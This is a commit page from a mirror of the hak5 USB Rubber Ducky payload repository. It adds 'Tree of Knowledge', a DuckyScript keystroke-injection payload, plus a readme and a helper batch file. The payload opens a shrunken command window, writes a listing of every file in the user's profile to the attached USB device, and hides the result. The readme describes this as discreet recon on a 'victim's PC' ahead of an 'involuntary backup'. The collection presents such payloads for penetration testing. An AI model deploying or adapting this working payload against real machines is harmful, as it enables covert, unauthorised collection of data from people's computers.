hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Gain knowledge from the Tree (#12) 

* Useful Reconnaissance Payload 

New payload based on the potential of the "tree" command.

* Update readme.md

* Update readme.md

* Update readme.md

* Update readme.md

* Delete library/payloads/recon/Tree of Knowledge/Bonus directory

I removed the exe

* Update readme.md

* Rename library/payloads/recon/Tree of Knowledge/readme.md to library/payloads/recon/Tree_of_Knowledge/readme.md

* Rename library/payloads/recon/Tree_of_Knowledge/readme.md to library/payloads/recon/Tree of Knowledge/readme.md

* Delete library/payloads/recon/Tree of Knowledge directory

* Gain knowledge from the Tree

Grabs the names of all the files on a victim's pc and hides them from prying eyes.
pull/13/head
Alex007-CyberGuy 2021-08-10 22:24:42 +02:00 committed by GitHub
parent 182a9a1859
commit e84b1b1338
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
3 changed files with 41 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
library/payloads/recon/Tree_of_Knowledge/payload.txt Normal file
View File

@ -0,0 +1,13 @@
REM Payload created by Alex007-CyberGuy
REM Check the readme.md file for more info on the payload and what is does.
DEFAULTDELAY 250
DELAY 3000
GUI r
DELAY 400
STRING cmd /k "mode con:cols=18 lines=1&color FE&cd %userprofile%&for /f %d in ('wmic volume get driveletter^, label ^| findstr "USB"') do set myd=%d&echo tree /a /f > echotree.cmd"
ENTER
DELAY 350
STRING echotree.cmd > %myd%/%computername%.txt&del echotree.cmd&attrib +h %myd%/%computername%.txt&exit
ENTER
ALT SPACE
STRING n

26
library/payloads/recon/Tree_of_Knowledge/readme.md Normal file
View File

@ -0,0 +1,26 @@
# Tree of Knowledge
## Intro
This payload copies the names of all the files on a victim's PC, then puts them on a file on the root of the ducky.
In order to remove suspicion, the ducky also automatically hides the gathered recon info so that it can only be seen when the batch file is run.
This whole process is relatively discreet, bug free and can run and finish in a matter of seconds.
This payload is great for the first phase of a Pen Test, since it effortlessly shows you the contents of a victim's PC, which can then later be used for an "involuntary backup".
## Requirements:
- Only works on Windows (7/8/8.1/10)
- Twin Duck firmware must be loaded
- The ducky must be labeled as "USB"
## Viewing files
In order to view the gathered recon file(s), simply put the show.bat program onto the root of the ducky and run it.
## Troubleshooting
1. Experiment with those delays.
2. Make sure that you don't already have a recon file saved from that computer.
3. ALT SPACE doesn't work on some encoders. Try using the java based encoder.
### Tip
The inject.bin still works even if it is marked as "hidden".
That's it folks!
I spent quite long in order optimise this payload, so enjoy!

2
library/payloads/recon/Tree_of_Knowledge/show.bat Normal file
View File

@ -0,0 +1,2 @@
echo off:
attrib *.txt -h /s /d